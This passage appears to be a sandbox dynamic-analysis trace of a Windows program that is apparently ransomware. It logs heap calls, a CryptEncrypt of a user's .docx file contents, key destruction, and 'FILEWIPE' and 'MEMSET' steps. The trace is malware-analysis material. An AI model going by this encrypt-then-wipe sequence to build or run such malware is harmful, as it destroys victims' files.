Size=0x10) returned 0x88c970 [0032.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1524d) returned 0x8cf6c0 [0032.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8cf6c0 | out: hHeap=0x770000) returned 1 [0032.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0032.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0032.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae968 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae968 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0032.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0032.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.976] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8ba460*, pdwDataLen=0x6ae220*=0x1524d, dwBufLen=0x15250 | out: pbData=0x8ba460*, pdwDataLen=0x6ae220*=0x15250) returned 1 [0032.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0032.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0032.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0032.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0032.977] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.977] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.978] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.978] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.978] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.978] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.978] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.978] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.978] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.978] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.978] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0032.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.986] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.986] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.986] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0032.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.990] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.990] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.990] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0032.990] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.990] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.990] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.990] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.991] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0032.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0032.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0032.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0032.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.991] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0032.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0032.991] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.991] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.991] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.991] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.991] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.991] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.991] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.992] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.992] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0032.992] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.992] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.992] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.992] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.992] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.992] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.992] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.992] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.992] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.992] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.992] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.992] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.992] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.992] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.992] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.992] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.992] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.992] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.992] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.992] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0032.992] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.993] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.993] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.993] FreeLibrary (hLibModule=0x754b0000) returned 1 [0032.993] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.993] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.993] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.993] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.993] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.993] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.993] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0032.993] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.993] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.993] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54bf33a0, ftCreationTime.dwHighDateTime=0x1d554dd, ftLastAccessTime.dwLowDateTime=0x87b8dd90, ftLastAccessTime.dwHighDateTime=0x1d57b4f, ftLastWriteTime.dwLowDateTime=0x87b8dd90, ftLastWriteTime.dwHighDateTime=0x1d57b4f, nFileSizeHigh=0x0, nFileSizeLow=0x1524d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="CIgOY5U5b6Axtcb.docx", cAlternateFileName="CIGOY5~1.DOC")) returned 0x7c2100 [0032.993] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.994] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.994] CharLowerBuffW (in: lpsz="byte[86605]", cchLength=0xb | out: lpsz="byte[86605]") returned 0xb [0032.995] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.995] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0032.995] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, 